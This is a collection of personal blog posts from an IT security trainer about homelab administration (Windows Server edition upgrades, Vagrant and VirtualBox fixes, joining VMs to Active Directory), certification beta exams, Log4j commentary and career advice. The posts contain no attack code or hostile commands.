I kept re-arming the trial license every 180 days until it ran out (slmgr /rearm, as per this article). After the max amount of renewals was reached, I re-installed and migrated the systems from Win2012 to Win2019 and continued the strategy of re-arming. 

Per this year, I decided to spring for a Microsoft Partner ActionPack.

Signing up Unixerius for the partnership took a bit of fiddling and quite some patience. Getting the ActionPack itself was a simple as transferring the €400 fee to Microsoft and away I go!

The amount of licenses and resources you get for that money is ridiculously awesome. Among the big stack of coolness, for my homelab, it includes ten Windows Server 2019 and 2022 licenses. There's also great Azure and MS365 resources, which I'm definitely putting to good use; it's a great learning experience!

---

Upon inspection of my homelab, it turns out that most of my Windows VM were installed as "Windows Server DataCenter Evaluation", simply because I wasn't aware of the difference between the Standard and DataCenter editions. Now I am. :)

It turns out that the ActionPack does not include licenses for DataCenter edition, so I needed to find a way to upgrade from the type "ServerDatacenterEval" to "ServerStandard". This great article helped me get this tricky situation fixed, because it's not completely simple.

Steps:

  1. Download the official Windows Server 2019 installation ISO from your partner center benefits dashboard.
  2. Make a snapshot or backup of your Windows server. 
  3. Login to the server with your account that has admin rights. 
  4. Start regedit.
    1. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion;
    2. Change CompositionEditionID to "ServerStandardEval".
    3. Change EditionID to "ServerStandardEval".
    4. Change ProductName to "Windows Server 2019 Standard".
  5. Close regeditDo not reboot.
  6. Connect the Windows Server installation ISO to the VM (or DVD drive).
  7. Start setup.exe from the DVD.
    1. Follow the installation instructions.
    2. Choose to upgrade "Windows Server 2019 Standard" and opt to use the online patches and updates.
    3. This process should allow you to retain all software, configurations and data.
  8. The whole process of upgrading and installing will take hours.
  9. Upon completion, you will need to provide your license key. Using the Settings app and the activation tool may not work. Turn to the commandline and run: dism /online /set-edition:serverstandard /productkey: /accepteula.

kilala.nl tags: ,

View or add comments (curr. 0)

Some struggles are hard to break

2022-02-18 12:27:00

When you next have 15-20 minutes and some coffee/tea/beer/etc, I'd consider this article an interesting read for anyone in DevSecOps and InfoSec.

The Six Dumbest Ideas in Computer Security - Marcus Ranum

That dates back to 2005 and reminds me that "the more things change, the more they stay the same". We still struggle with a lot of these issues today and my team at $Client literally discussed some of these last week.

Is Ranum infallible? No. Is Ranum 100% correct? No, I'm sure he's not. Is point #4 dead wrong? Yes. But it's still a nice read to make you pause and think.

And, while we're traipsing down Memory Lane, here's Schneier in 2004 bringing up product safety standards for software products.


kilala.nl tags: ,

View or add comments (curr. 0)

Took the CompTIA Project+ beta

2022-01-29 11:04:00

Back in November, CompTIA announced the upcoming Project+ v5 certification exam. My day-to-day job does not entail project management, but I was curious about the exam anyway.

It's no secret that beta-testing CompTIA exams has become a hobby of mine. Thus, I jumped at the chance to take it, when someone posted about it on Reddit. As has become tradition, I pludged the exam: i.e. I went in with zero preparation, only browsing through the exam objectives document

My impressions of Project+ PK1-005 (to become PK0-005):

Overall, I'm feeling pretty good about this update to Project+. 

Will it be a valuable certificate for your resumé? Maybe not, with bigger brand names having more recognized project management certs. But will it rank up there with something like PSM-I or PSPO-I? Or something like PRINCE2 fundamentals? Yeah, probably. 

Finally, do I think I passed? I expect I didn't: my experience and knowledge of formal project management, especially things like PRINCE2, is very meager. 


kilala.nl tags: , ,

View or add comments (curr. 0)

VirtualBox and Vagrant error: E_ACCESSDENIED (0x80070005) - Access denied

2022-01-23 09:25:00

I've been using Vagrant for a lot of my quick tests and my classes for a while now. A few weeks ago, my old Vagrantfile configurations stopped working, with Vagrant and Virtualbox throwing errors like these:

There was an error while executing `VBoxManage`, a CLI used by Vagrant for controlling VirtualBox.The command and stderr is shown below.

Command: ["hostonlyif", "ipconfig", "vboxnet0", "--ip", "192.168.33.1", "--netmask", "255.255.255.0"]

Stderr: VBoxManage: error: Code E_ACCESSDENIED (0x80070005) - Access denied (extended info not available) 

VBoxManage: error: Context: "EnableStaticIPConfig(Bstr(pszIp).raw(), Bstr(pszNetmask).raw())" at line 242 of file VBoxManageHostonly.cpp

 

Or, in a more recent version of Virtualbox:

The IP address configured for the host-only network is not within the allowed ranges. Please update the address used to be within the allowed ranges and run the command again.

 Address: 192.168.200.11

 Ranges: 192.168.56.0/21

Valid ranges can be modified in the /etc/vbox/networks.conf file.

 

A search with Google shows that a few versions ago VirtualBox introduced a new security feature: you're now only allowed to whip up NAT networks in specific preconfigured ranges. Source 1. Source 2. Source 3.

The work-arounds are do-able. 

While the prior is more correct, I like the latter since it's a quicker fix for the end-user. 

BEFORE:

stat1.vm.network "private_network", ip: "192.168.200.33"

 

AFTER:

stat1.vm.network "private_network", ip: "192.168.200.33", virtualbox__intnet: "08net"

 

 

Apparently it's enough to give Virtualbox a new, custom NAT network name. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

That one time I didn't beta-test two Mile2 exams

2022-01-22 16:00:00

Mile2 are a training company, aiming to provide vendor-neutral InfoSec training and certification exams. I've heard their name a few times, but have never taken any of their trainings. Reddit and TechExams also have little experiences posted about them.

That's why I was very curious and interested to join Mile2's beta program for their C)ISSO and C)PTE exams. These new versions are ANSI accredited (meaning they will require CPE points every three years) and have been renewed in a few other ways. Sounds like a great opportunity to give them a shot. Besides, taking beta exams is a hobby of mine.

Requesting access was a solid process, as you needed to submit a bit of a resumé to prove you'd be a valued reviewer/tester. I was approved for the program pretty swiftly, with clear instructions from their marketing team. 

I reported back to the team, with a few doubts about the sign-up process.

Half an hour later my access was revoked and I was ejected from the beta program, the team citing my "obvious distrust of their organization". Oh well.


kilala.nl tags: , ,

View or add comments (curr. 0)

Memes in corporate communications

2021-12-28 07:29:00

It's been years now, since Internet meme imagery has started showing up in corporate communications: from adverts to internal Powerpoint presentations, you've probably seem them. A quick talk at the office made me remember that classic episode of Star Trek:tNG, where the crew have a run-in with the Tamaran who speak in metaphors.

It made me realize, as linguists have been pointing out for aeons apparently, that we as global people can definitely head in the same direction. I mean, sure! My best friend Menno and myself can speak in 90s animation memes! So why not?

Here's how you could explain the current Log4j hullabaloo in meme-speak.

JNDI:       There's no way this could go wrong!
Log4j:      ORLY?
Log4j:      Yo dawg, we heard you like resolvers in your logs! So we put...

2021:       Pwning log4j hypetrain, let's go! To the moon!
Researcher: Shit's on fire yo.
InfoSec:    My hair is on fire! My hair is on fire!
Management: Let's go! In-n-out! 20 minute adventure
InfoSec:    One does not simply ...
DevOps:     Science dog has no idea what he's doing.
DevOps:     I know nothing about ... at this point I'm too afraid to ask
InfoSec:    This is fine.

2031:       Remember when? ... Pepperidge farms remembers!

 


kilala.nl tags: ,

View or add comments (curr. 0)

Explanation of the Log4j vulnerability and how we got here

2021-12-27 15:37:00

two options for resolving variables in logging

Fabian Faessler, aka LiveOverflow, runs a wonderful YouTube channel where he explains all kinds of InfoSec and other hacking related topics. I'm a huge fan of his two-part explanation of the recent Log4j vulnerability. 

We've seen plenty of proofs-of-concept and rehahshes of JNDI-problems. In his video, Fabian instead delves into the matter of how we even got into this mess.

The screenshot above is from part 2. It asks developers the honest question: what would have been better, more secure? Do we want a logging solution which can resolve arbitrary variables and macros? Or should we have a plain logger, which needs to be spoon-fed what it needs to log?

In secure design, we should always choose for option B. But I guess that historically "features" and "shiny factor" won over "basic design".

If you have half an hour, I suggest you grab some coffee and go give this series a watch!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Mike Sass' excellent infosec training retrospective

2021-12-27 11:07:00

I just found this awesome page (a very long read), which is a retrospective of Mike Sass' five-year education path. Lots of good advice about studying infosec, and mini-reviews of many trainings (SANS and others). 

https://shellsharks.com/training-retrospective


kilala.nl tags: , ,

View or add comments (curr. 0)

I sat the CFR-410 beta: CertNexus CyberSec First Responder

2021-12-27 08:37:00

A few weeks ago CertNexus announced the public beta of their CyberSec First Responder (CFR) exam, version 410. Three years ago I took the beta for CFR-310. At the time I wasn't overly impressed by the exam, so I decided to take it again to see if they improved.

They did not. I can actually literally repeat what I said three years ago, while replacing "Examity" with "OnVue".

Comparing this to CySA+, I like CompTIA's exam a lot better.

My take-away: if you're in the US and must get a DoD 8570-listed certificate for one of the CSSP roles, then you may find CFR to be easier than CompTIA's CySA+ or Pentest+.

CFR is also marginally cheaper than CySA+ ($350 vs $370). But it's the renewal fees where you may want to opt for CompTIA, if you have more than one of their certs. Both companies charge $150 per three years, but in CompTIA's case the fees for multiple certs are often combined, so you don't have to pay multiple. 

I'm curious to see what the end-result of my scoring will be. But if I do pass, I will not be paying my CFR annual fees.

EDIT:
One thing I don't like about the CFR-410 exam is this section on page 5 of the objectives document:

"The information that follows is meant to help you prepare for your certification exam. This information does not represent an exhaustive list of all the concepts and skills that you may be tested on during your exam. [...] The information beyond the domains and objectives is meant to provide examples of the types of concepts, tools, skills, and abilities that relate to the corresponding domains and objectives. All of this information [...] does not necessarily correlate one-to-one with the content covered in your training program or on your exam.

It sounds like they're saying: the exam may include specific tools and techniques not listed as examples on the objectives document. 

You could argue that's fair enough, because it's impossible to list all tools that you'll ever run into on the job. But on the other it creates a moving target for students who are already anxious enough about taking a big exam. 

With CompTIA's exam objectives you can always count on it that "if it's not on the objectives, it's not on the exam". 


kilala.nl tags: , ,

View or add comments (curr. 0)

On the "why" of package managers

2021-12-24 09:43:00

On the CompTIA A+ Discord we got into a little chat about apt package management. Someone really wanted a real-world example. Since "apt install wireshark" doesn't really tell them much, I typed up the following. 

What we haven't been hitting on here and which might not come up in the objectives either is "why?". Why do we even need yum, apt, brew, choco, dnf and so on?

To answer that in as short a time as possible: installing software can be a tricky thing, because of "dependencies". Software needs more software, which needs more software, to run. 

A piece of software is almost never stand-alone: it needs libraries, drivers, programming language interpreters, supporting tools and so on. And if you start working with Python, Java, NodeJS and so on, you will really get stuck in "dependency hell". 

On Windows, standalone software installs often come as MSI or EXE installer. On Linux they come in the form of DPKG, RPM and other package formats. Now, if you want to run software that was installed via only such an installer, you'll quickly run into problems "Help! I'm missing X, Y and Z! You need to install those too!"

Package managers like Yum, APT, Homebrew, Chocolatey and so on help us with that. They will look at the list of dependencies that such an RPM / DPKG might have and make a grocery list. :) "You want this? Fine, then we'll also get X, Y and Z and get'm setup for you."

That's the "WHY?". It makes sudo apt install wireshark so nice, because it'll fetch ALL the extras Wireshark needs to run. For example. 

Now Overwatch? That's gonna be interesting. Because where do all these packages come from? From "repositories", central databases of software packages. They are often run by the company making your chosen Linux, but there's also independent ones (like choco, brew and more). Plus, commercial vendors also often have their own repositories setup which you can subscribe to. This is how you would install Microsoft's Gitlab, for example. 

Question is: do Blizzard have a repo to install Overwatch from? I don't know. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another month, another beta: CertNexus CFR-410 and Project+

2021-12-22 16:16:00

Back in 2018, I took the CertNexus CFR-310 beta exam. It was okay. 

This week I learned that CN are launching CFR-410 with another beta (quoting their Facebook):

"Due to the high demand for the CFR-410 beta testers, we have decided to offer 75% off the voucher for the CFR-410 beta exam for a limited time. To participate, please go to https://bit.ly/CFR-410-voucher, create an account (or sign in), add the exam voucher to your cart and enter coupon code CFRBETA75 during checkout.

For more information on #CFR go to https://certnexus.com/certifica.../cybersec-first-responder/."

Final cost after discount: USD 87.50. I booked it and am waiting for the beta to open up. 

As a reminder, CFR-410 (and 310) are a security incident response exam, the acronym referring to CyberSec First Responder. It's comparable to CompTIA's CySA+ (cybersec security analyst) and the much better GCIH (GIAC incident handler). I'm curious how this'll play out!

Speaking of other upcoming betas: Project+ 005 from CompTIA is coming up. And yes, they will run a beta exam, starting in January. I might be curious enough to just give it a shot, see what it's about. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Took the CompTIA XK0-005 Linux+ beta

2021-12-05 09:09:00

Less than 48h ago, the new beta version of CompTIA's Linux+ exam, XK0-005, was opened to the general public. Or is it XK1-005?! I've asked them what's up with that XK0/XK1. Since taking CompTIA's beta exams is a big hobby of mine, I jumped onboard immediately!

Three years ago I was not very impressed by the XK0-004 beta. I felt it was too easy and too heavily focused on git and legacy software like init. Since there's an embargo on the objectives (which you can download from the official page I linked above) I can't discuss the objectives nor what's on the test. But I can tell you this much:

Some of the questions were really, really long. Like, "print this on A4 and it fills a whole page" long. I felt that might scare off the intended entry-level audience, so I put that in the comments. 

My conclusion: this exam is looking good! I would say that, content-wise, it's now on par with what I'd expect from RHCSA. I don't have recent experiences with LPIC or LFCS, I should give those a look sometime soon. 

I expect that my next group of students at IT Vitae will still be testing against version 004, but I will start updating my training materials for the next groups. The objectives have changed thoroughly. 


kilala.nl tags: , ,

View or add comments (curr. 0)

I still don't regret switching to MacOS

2021-11-08 21:37:00

It has been almost exactly 18 years since I switched to MacOS, coming from Windows and Linux. November 2003! When the Powermac G5 was the hottest thing (literally). 

MacOS 10.3 was ready to drop and I was giddy about that beautiful, heavy cheesegrater under my desk. 

Why bring this up now? Because I just realized that the three laptops I'm using have all been great for us! Thee Macbooks Air, two from 2014 and one from 2017. All with 8GB of RAM and the i5 CPU. And they still work perfectly fine for my daily needs! 

They run my Docker containers, my Linux VMs with VirtualBox and Vagrant, my BurpSuite and all my productivity tools. And they're still good looking, light and quiet. That was money well spent!


kilala.nl tags: , ,

View or add comments (curr. 0)

I tested CompTIA Server+ and it wasn't great

2021-10-29 09:21:00

I just passed CompTIA's Server+ exam, which was a "meh" experience. 

The exam crashed twice on the same PBQ (literally the very first question!), but the proctors were awesome about it.

In the first crash, not even the chat tool worked, so I powered down and not 1 minute later my phone rang. The proctor was very helpful in getting me back to my exam. The second time I went back to that broken question it hung again, but luckily chat was still working so the proctor reset my connection. 

In short: the exam has solidified my opinion that the CompTIA PBQs work badly on MacOS systems. The OnVue software clearly puts stress on the system, because my fans were going wild nonstop.

Based on the Server+ exam contents (I did not read any of the books) this is not a course/exam I would recommend to anyone with over a year of data center experience. It would make a nice introduction to someone starting as DC tech or Unix/Windows admin.


kilala.nl tags: , ,

View or add comments (curr. 0)

Renewing CompTIA certification

2021-10-12 13:08:00

A question that comes up pretty frequently on Discord, is about CompTIA's renewal process. Like ISC2, ECC and SANS/GIAC, CompTIA also have a program that works with CPE/CEU (study credits). However, they're actually a bit more flexible than the others.

Here's a nice comparison of the "easiest" ways to renew.

TLDR, you either:

 

Me, I've always gone for the last option, which is silly because getting PT+, CYSA+ and CASP+ would have renewed all my certs for free. 😐 Wasted money


kilala.nl tags: , ,

View or add comments (curr. 0)

Linux+ practice resources

2021-10-10 17:23:00

Here's a list of practice resources I suggest to my Linux+ students, for Bash and Linux in general.

Special mention:

Complete newb level:

Early on, for beginners:

Advanced:


kilala.nl tags: , , ,

View or add comments (curr. 1)

Where to go after Security+

2021-10-10 11:32:00

There's a question which commonly comes up on Discord. I thought I'd just make a blogpost out of my most common response.

"I need you to suggest me onto path after security+. I want to develop my pen-testing and web security skills."

Here's a great overview of all kinds of security certification tracks -> https://pauljerimy.com/security-certification-roadmap/

If you're a rookie pen-tester and need a start with the basics, then eLearnSec's eJPT was always a decent start.

Pentest+ is CompTIA's cert that tests for 1-2 years of professional experience (or bruteforce book-learning). In Paul's overview it's lower ("easier") than eJPT, which I disagree with.

For a little more experienced people, eWPT and eCPPT from eLearnSec were also decent. Or, if you want to pack a bit more oomph, go for PWK (pentesting with Kali) from Offensive Security. The capstone to PWK is the now famous OSCP practical hacking exam.

OSCP combines research skills, time management and documentation with technical challenges which are not "too hard" (their difficulty lies mostly in the huge variety offered).

There are many cool sites that offer free or affordable education through labs, like TryHackMe and HackTheBox. Personally I've been a fan of PentesterAcademy, who put out good quality content and whose courses can go really in-depth.

If you have an employer who's not afraid to spend some money on you and you still have budget left, consider the SANS trainings + GIAC exams. They're expensive, but have a good reputation and the trainings are awesome.

GSEC can be considered their next step after Security+. GCIH and GPEN are the GIAC "better-than" certs compared to CySA+ and Pentest+... Their training courses SEC504 and SEC560 are awesome... and ?

Finally I'd like to plug Antisyphon trainings

They offer very good value for money, via online trainings. Some of these are pay-what-you-can, letting you pay somewhere between $25 and $495. Others are fixed price, but well worth it.

Case in point -> Modern webapp pentesting with B.B. King.

That's $495 for 16 hours (4*4h) of online training with a group of fun students and the excellent B.B. King. It goes into a whole bunch of very important tactics and testing methods for modern web applications. Recommended!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another season of classes done, which has left me a bit empty

2021-10-09 17:57:00

Halfway through May I started teaching Linux+ to the cyber-security "Group 41" at ITVitae. It's been 16 classes since then, nearly a hundred contact hours with a marvelous group of students.

And now, like I've had before after finishing a big project, I'm feeling a bit empty. In 2017, not a day after finishing my OSCP exam, I quickly felt empty and lost. And now that I'm officially done with "my" kids, I'm also at a loss. It feels odd, not teaching them anymore.

So. Best look to the future! Hopefully I'll teach a new group in a few months and until then I'd like to shoot for the DCA and CKA Docker/K8S exams.


kilala.nl tags: , ,

View or add comments (curr. 0)

Homebrew CMS security issues

2021-08-23 21:22:00

Back in early 2019 I first learned how to properly apply CSP to my site's code. It was a very educational learning experience and by the end of it I managed to score an A+ in Mozilla's Observatory (which does compatibility and security checks on your site). 

Imagine my surprise when earlier today I learned that A) my CSP wasn't being used anymore, the header wasn't even set and B) my Observatory score had dropped to an F! Wow, what happened?!

It turns out that Dreamhost's PHP wasn't using my .htaccess file anymore, on the PHP 7.3 setup that it was running. A switch to PHP 7.4 with their FastCGI setup and we're back in business. 

Also, hooray for the CSP Evaluator tool!

That'll teach me to regularly scan and check my own site. :|

I was prompted to go check out my own CSP settings, thanks to Scott Helme's recent post -> I turned on CSP and all I got was this crappy lawsuit


kilala.nl tags: ,

View or add comments (curr. 0)

The price our grand-children were to pay

2021-08-11 08:14:00

We need change now.

Image courtesy of UN Climate Action.

"There's a price our grand-children will have to pay."

Remember that one? About the climate? We've been saying that for so long that we forgot what it means. Well, fun's over: we are those grand-children. My generation, the twenty-somethings I teach at school, my daughter! We're all going to pay the piper, starting this decade. 

The IPCC, an international cooperation of hundreds of scientists, has recently confirmed that what they've been saying for decades is not only true, it's also happening right now. 

The full report is a whopping 1300 pages, which is too much for mere mortals such as you and me to take in. But luckily there's friendly folks who create summaries.

Or as Zentouro puts it, if you really want to panic and feel desperate, try playing with the IPCC's Interactive Atlas which shows you exactly how things will be changing on the short term.

To put it bluntly: all of us will need to pull together and start taking measures that we will not like. Forego travel-for-fun, drastically cut down meat consumption and your consumption of luxury goods overall. Bitter pills to swallow and all that. But if that means that the earth will only burn for fifty years instead of a hundred, I guess that'll be worth it. 

To make sure that it's not just us putting in the efforts, make sure to influence your local politics! It's not just the people who need to change, it's our nations and our companies.

Write to your representatives, to your congressmen, to your politicians. Refer them to the IPCC's summary for policy makers, refer them to the IPCC's FAQ on the AR6 report

It's time to get angry and to help make changes. It was time thirty years ago, but better late than never.


kilala.nl tags: ,

View or add comments (curr. 2)

Automatically integrate Vagrant-built VMs into VMWare ESXi and Active Directory

2021-08-05 15:49:00

I've been using Vagrant to build new VMs in my homelab, which saves me a boat-load of time. Afterwards I still needed to do a few manual tasks, to make sure the VMs integrate nicely into my Active Directory and my VMWare ESXi server. 

With a bit of fiddling, while setting up the Kubernetes cluster, I came to a pretty decent Vagrant provisioning script. It does the following:

The spots with ${MYUSER} and ${MYPASSWORD} are a privileged domain admin account. 

apt-get install -y open-vm-tools

systemctl enable open-vm-tools

systemctl start open-vm-tools


apt-get install -y oddjob oddjob-mkhomedir sssd sssd-tools realmd adcli \

samba-common-bin sssd-tools sssd libnss-sss libpam-sss adcli policykit-1 \

packagekit


cp /vagrant/realmd.conf /etc/realmd.conf

realm join --unattended --user ${MYUSER} corp.broehaha.nl <<< ${MYPASSWORD}


echo "sudoers: files sss" >> /etc/nsswitch.conf

cp /vagrant/sssd.conf /etc/sssd/sssd.conf


cat >> /etc/ssh/sshd_config << EOF

AllowGroups linux-login

AuthorizedKeysCommand /usr/bin/sss_ssh_authorizedkeys

AuthorizedKeysCommandUser nobody

EOF


systemctl enable sssd realmd ssh

systemctl restart sssd realmd

kilala.nl tags: , ,

View or add comments (curr. 0)

Is OSCP a good place to start pen-testing certification?

2021-08-05 07:46:00

Someone on Discord recently asked me: "Is OSCP a good first cert for someone who wants to go into pentesting?"

I thought I'd share the response I gave them. I hope it's still a valid viewpoint, what with my OSCP being a few years ago.

========================

Yes, but no.

OSCP is entry-level stuff when you look at it from a technical perspective. All the exploits and vulns we need to work with during the exam are relatively clear-cut and you don't have to do any development yourself. 

What makes OSCP a heavy-hitter is the non-technical aspects: you are under incredible pressure (X boxes in Y hours, plus a full report), you are given a black-box environment with targets that could be (almost) anything. OSCP is about research skills, about time management, about perseverance.

If you do the PWK class work before the exam, you are almost fully prepped for the technical aspects (vuln types, exploiting vulns, etc). Doing a large part of the PWK labs will prepare you for the research part of the exam. Which leaves time management and perseverance, which are personal skills that you need to bring yourself. 

If you were to ask me for a better place to start, I'd look at eJPT first. 

Get your feet wet with the basics and something that's also recognized as a solid first start. 

I personally think OSCP isn't a good first cert because, if you're still getting to know your way around the tech basics, then you won't have enough time to learn-on-the-job during the exam. 

If you have a good background on Linux/Unix and Windows, knowing how their services can be abused and how privesc can be done, and you've actually done it a few times, then you're on the way. Ditto for vulns and exploits in webapps or other network services: if you understand them and can apply them, then at least you have the basics out of the way.

With the OSCP exam, there's no telling what you're getting! It could be relatively new software on a new OS, or it could be an antique application in a weird old language. 

If you know the basics of vulns and exploits, then you at least know what you're looking for. You will only have to learn the actual target on-the-fly.


kilala.nl tags: ,

View or add comments (curr. 0)

Dick would have enjoyed this: new addition to the lab

2021-07-29 14:45:00

A stack of servers and a phone

Last week was awesome! It was the last Friday before summer break, so I decided to move the class on Vagrant and Docker forward. This would give my Linux+ students a few cool things to play with during their holiday!

Next to that very fun day, one of my colleagues at ITVitae also gifted me a piece of old gear: a lovely, 2009 Apple XServe 3.1. Dick would've loved that, what with us both being Apple-geeks.

The drives were wiped, so I've found a way to image the MacOS 10.11 installer onto one of them. Aside from that: it has dual Xeons like my R410 and R710, 3x2TB of disks (one of which will move to the R710 for my lab) and 24GB of RAM.

This baby might be noisy and a bit underpowered, but it'll make a great Docker-host to complete my lab. Awww yeah!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Not renewing my CEH

2021-06-23 15:27:00

Over the past decade or two, I've put in a lot of study-time to garner certificates for continued professionalization. Some of'm I'm really proud of, some were fun or cool, some were frustrating and some were just "meh".

EC Council's CEH (Certified Ethical Hacker) is one of those "meh" certificates, where my biggest motivation for continued renewal was the dreaded HR-checklist. EC Council have a great marketing department, that's ensured that "CEH" is on many corporate security job requirements.

That's the only reason why I kept paying my annual dues. Never because I'm proud of it, or because I feel it adds to my profession, always for the market value. 

Not any more. 

Between recent social media muck-ups, between debatable practices and mediocre professional value, I've decided to stop sending my money to ECC. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Failure is a great teacher

2021-06-20 21:19:00

A few weeks ago I noticed that my Win2012 trial licenses are no longer tennable: a big change to my homelab is needed! Since then I've worked dilligently on a few projects, all happening in parallel.

That's a lot of stuff going on!

As the title of this post says: failure is a great teacher and boy did I have a lot of failures! 😂

For now there's too much to sum up in great detail, so I'll get back to the deets later. For now, some stuff I ran into:

After a weekend with lots of hard work, my AD domain is stable and usable again. All GPOs work again, the syncing between DCs works, the DFSR for SYSVOL works again. And the migration of the issuing CA to 2019 has also completed, with hosts being able to auto-enroll and validate certs again. 

There's so much more to do though! Thank ${Deity} for my Jira boards!


kilala.nl tags: , , ,

View or add comments (curr. 0)

CompTIA Pentest+: objectives comparison between PT0-001 and PT0-002

2021-06-01 19:08:00

It's a bit late, but people studying for the Pentest+ PT0-002 beta exam can probably use a list of all the differences between versions 001 and 002 of the objectives. I reckon the list could also be useful for students who want to give it a shot in October / November, because very few study materials will be available. 

I've done a quick cross-reference of the objectives documents (also linked below), to make an Excel / CSV with the differences between the objectives. Careful, they're probably not 100% on the money.

CompTIA trainers get a licensed document that does a better job at explaining the differences, but we can hardly share that, right? My comparison document was made the hard way, literally cross-matching both objective documents. Hence why I may have made a few mistakes.

The official objective documents:

And here's CompTIA's official blog about the two exam versions.


kilala.nl tags: ,

View or add comments (curr. 0)

Dynamic DNS and a discovery about Unifi equipment

2021-05-29 21:07:00

It's odd that I've never had much of a use for dynamic DNS solutions, but now that I'm testing VPN to my homelab I've also taken a look at AFraid's FreeDNS

So far I'm enjoying the late 90s, early 2000s look-and-feel of their management interface. It's endearing!


kilala.nl tags: ,

View or add comments (curr. 0)

Homelab rebuild needed

2021-05-29 20:39:00

Well darn. The "slmgr -rearm" trick will no longer work, after renewing the trial licenses on my WinSrv 2012 boxen a few times. This means I'll have to rebuild my Active Directory and Certificate Services infrastructure on short notice. Better yet, it's time to do something with my/our partnership contract with Microsoft, to get official licenses for Win2016. 

Oddly, Nicola's instructions on making the iDRAC6 remote console work on MacOS now fail for me. The connection that worked a month ago now reliably fails as "Connection failed". 

Luckily, Github user DomiStyle is awesome! They've prepared a Docker container that runs the iDRAC connection software and makes two local ports available: 5900 for VNC and 5800 for the web interface. It's excellent!


kilala.nl tags: , ,

View or add comments (curr. 0)

Know your limitations, even if it's "too late"

2021-05-27 10:55:00

I don't know if my old classmate René is still reading along. If he is, he'll nod approvingly and think to himself: "told you so". :)

I feel very heavy-hearted, because I feel that I’m letting a few awesome people (Stephen, Thomasina, Rick B. at CompTIA) down. 

I'm backing down from teaching the Pentest+ TTT. It seems that I’ve been harboring a lot of stress, piling on way too much for myself, without really noticing it. To make sure that I can still pay full attention to my family, my primary customer, my students at IT Vitae and my own studies, I have to drop this responsibility.

I was very much looking forward to helping CompTIA with Pentest+, but right now it would not be a smart thing to continue with.


kilala.nl tags: , ,

View or add comments (curr. 0)

DevChamps "Extreme Automation" training

2021-05-17 06:56:00

After completing PDSO's CDP (Certified DevSecOps Professional) two months ago, I was left wanting more. More CI/CD, more pipelines, more automation. That's when, via-via, I met Andrey Adamovich via LinkedIn. Andrey works with a collective of DevOps trainers, to teach his XA: Extreme Automation training.

To sum it up: I was looking for a little extra fun, to expand upon what I'd learned in the past two years and the price was right at €700 for a three-day training with all the labs neatly arranged for students. 

To summarize my impressions:

Would I recommend Andreys class? Yes, especially to folks in my shoes (security engineer) who need a quick introduction to modern-day IT infrastructure.

As to what I've learned during class? Well, Ansible and Docker weren't new to me, but that's perfectly okay. Terraform was very nice to get to know better, while Packer and Kubernetes were eye-opening. 

My biggest take-away is that I'm behind the times on modern-day infrastructure. This class has helped me recognize some of my bigger knowledge-gaps, which means I can now address them. 

My first order of business in my homelab should be to attempt a complete rebuild, using Packer to create golden images and using Terraform to drive VMWare ESXi, instead of using Vagrant. From there on out, I should try to use my Gitlab instance together with K8s and Docker to run many of my services. Luckily I have two Dell servers for my lab, so I can repurpose an old laptop as Terraform+Packer box while using the smaller Dell to first test-run my configs. 

The sad part is, as Andrey mentioned halfway through day 3: he expects that within a few years many apps and services will move to a server-less model, like Lambda or Azure Functions. That means that >60% of what we learned in XA will become much less useful. 


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA closed beta for CASP+ CAS-004

2021-05-13 10:33:00

CompTIA often have beta releases for new versions of their exams. You'll notice my blog has articles dating back a few years, where I keep doing these beta tests, "for fun and profit". Most betas are open to all takers, but the CASP+ (advanced security practitioner) is "closed". With thanks to some very nice people at CompTIA I managed to get accepted into the closed beta. 

Took the test this morning, at home via the OnVue testing solution. As before my experiences with OnVue were decent. 

However! In a not-so-fun move, PearsonVue decided to do a big and unannounced IAM change! Anyone who's testing via PearsonVue for CompTIA, whom also has tested for other companies (such as Microsoft) has now been forced to take a new username. They literally changed everybody's login names, without warning them up front. And no, you also don't get an email. Now they have a warning on their login page, but last night I got a big fright because there was zero information!

Here's a few things I took away from the CAS-004 beta.

The exam gave me three hours time and took me between a bit less than two hours to power through without going back to any questions. There were plenty "bad" questions in there (see above) and a few where I honestly would not know the answer. Since this is a beta I decided to pludge it without studying any of the books or materials.


kilala.nl tags: ,

View or add comments (curr. 0)

Exciting times ahead! Working with CompTIA

2021-05-02 09:12:00

pentest book

Wow, it looks like this is really happening! Amazing! :D

I was recently contacted by Stephen, from CompTIA's CIN. They wondered whether I'd be interested in teaching the TTT (train the trainer) for PT0-002 Pentest+ in October. 

It's daunting! It's exciting! It's gonna be a lot of fun! :)


kilala.nl tags: ,

View or add comments (curr. 0)

A short review of CompTIA Security+

2021-04-30 09:41:00

Earlier this year I completed CIN's TTT (train-the-trainer) for Security+, CompTIA's entry-evel InfoSec certification. I hope to teach the subject matter at ITVitae or elsewhere in the near future, so I'd better prepare myself on the exam objectives. 

Overall I'm pleased with the body of knowledge covered by Security+; there's a reason why I frequently recommend the learning path to colleagues starting out in IT security. The BoK covers security fundamentals which I feel should be understood by anyone in IT: developer, engineer, risk management, I don't care. Everybody in IT should know this stuff. :)

Paul Jerimy's excellent security certification roadmap places Sec+ at the foundational level. There's no shortness of comparisons between Security+, SSCP, CISSP, GSEC, CEH and others on the Internet, for example this one. Most of us agree: Sec+ is foundational knowledge for those starting in IT. 

I sat the exam this morning, version 601, and I passed. Would've been worrisome if I hadn't! ;) 

I'm pretty happy with the exam's contents: there's a decent spread of topics covered and only two out of my 82 questions were worded sub-optimally. The PBQs actually were pretty good!


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA PT1-002 Pentest+ beta

2021-04-23 09:45:00

A little under three years have passed since I last took the CompTIA Pentest+ exam. Like last time, I took the beta-version of the exam. Just like last time, I decided to go into the exam completely blank, only taking a glance at the official objectives beforehand.

The OnVue at-home testing experience offered by PearsonVue, like always, was decent. The tooling works well enough, the proctor was communicative, waiting times weren't too bad. The software feels kind of intrusive, as to what it wants to do on your laptop, but at least it didn't want me to install anything, nor does it require admin-level rights. 

As to the exam itself, my experiences mirror what I felt back in 2018: 

I feel that the PT1-002 exam needs some polishing and a few corrections, but overall the level of difficulty and the type of questions asked do in fact do a fairly good job at testing someone with 2-3 years of pentesting experience.

